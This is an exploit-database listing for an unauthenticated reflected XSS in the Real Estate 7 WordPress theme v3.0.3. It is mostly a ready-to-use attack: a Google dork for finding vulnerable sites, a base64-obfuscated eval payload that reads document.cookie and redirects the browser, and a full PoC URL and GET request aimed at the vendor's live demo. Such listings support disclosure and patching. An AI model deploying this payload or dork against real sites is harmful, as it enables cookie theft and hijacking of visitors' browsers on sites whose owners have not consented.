Advertisement






Real Estate 7 WordPress v3.0.3 - Unauthenticated Reflected XSS

CVE Category Price Severity
N/A CWE-79 N/A High
Author Risk Exploitation Type Date
Unknown High Remote 2020-07-23
CPE
cpe:cpe:/a:wordpress:real-estate:3.0.3
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020070119

Below is a copy:

Real Estate 7 WordPress v3.0.3 - Unauthenticated Reflected XSS
[+] Exploit Title: Real Estate 7 WordPress v3.0.3 - Unauthenticated Reflected XSS
[+] Google Dork: inurl:/wp-content/themes/realestate-7/
[+] Date: 2020-07-23
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: Chris Robinson [ https://www.contempothemes.com ]
[+] Software Version: 3.0.3
[+] Software Link: https://themeforest.net/item/wp-pro-real-estate-7-responsive-real-estate-wordpress-theme/12473778
[+] Tested on: Debian 10
[+] CVE: 
[+] CWE: CWE-79



### [ Info: ]

[i] An Unauthenticated Reflected XSS vulnerability was discovered in the Real Estate 7 theme v3.0.3 for WordPress.



### [ Payload: ]

[$] "><img src=x onerror=eval(atob(`amF2YXNjcmlwdDphbGVydChgVkxBRCBWRUNUT1JgKTthbGVydChkb2N1bWVudC5jb29raWUpO3dpbmRvdy5sb2NhdGlvbj0naHR0cHM6Ly92bGFkdmVjdG9yLnJ1Lyc7`));>



### [ PoC: ]

[!] https://contempothemes.com/wp-real-estate-7/elementor-demo/?ct_keyword=%22%3E%3Cimg%20src%3Dx%20onerror%3Deval%28atob%28%60amF2YXNjcmlwdDphbGVydChgVkxBRCBWRUNUT1JgKTthbGVydChkb2N1bWVudC5jb29raWUpO3dpbmRvdy5sb2NhdGlvbj0naHR0cHM6Ly92bGFkdmVjdG9yLnJ1Lyc7%60%29%29%3B%3E

[!] GET /wp-real-estate-7/elementor-demo/?ct_keyword=%22%3E%3Cimg%20src%3Dx%20onerror%3Deval%28atob%28%60amF2YXNjcmlwdDphbGVydChgVkxBRCBWRUNUT1JgKTthbGVydChkb2N1bWVudC5jb29raWUpO3dpbmRvdy5sb2NhdGlvbj0naHR0cHM6Ly92bGFkdmVjdG9yLnJ1Lyc7%60%29%29%3B%3E HTTP/1.1
Host: contempothemes.com



### [ Contacts: ]

[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.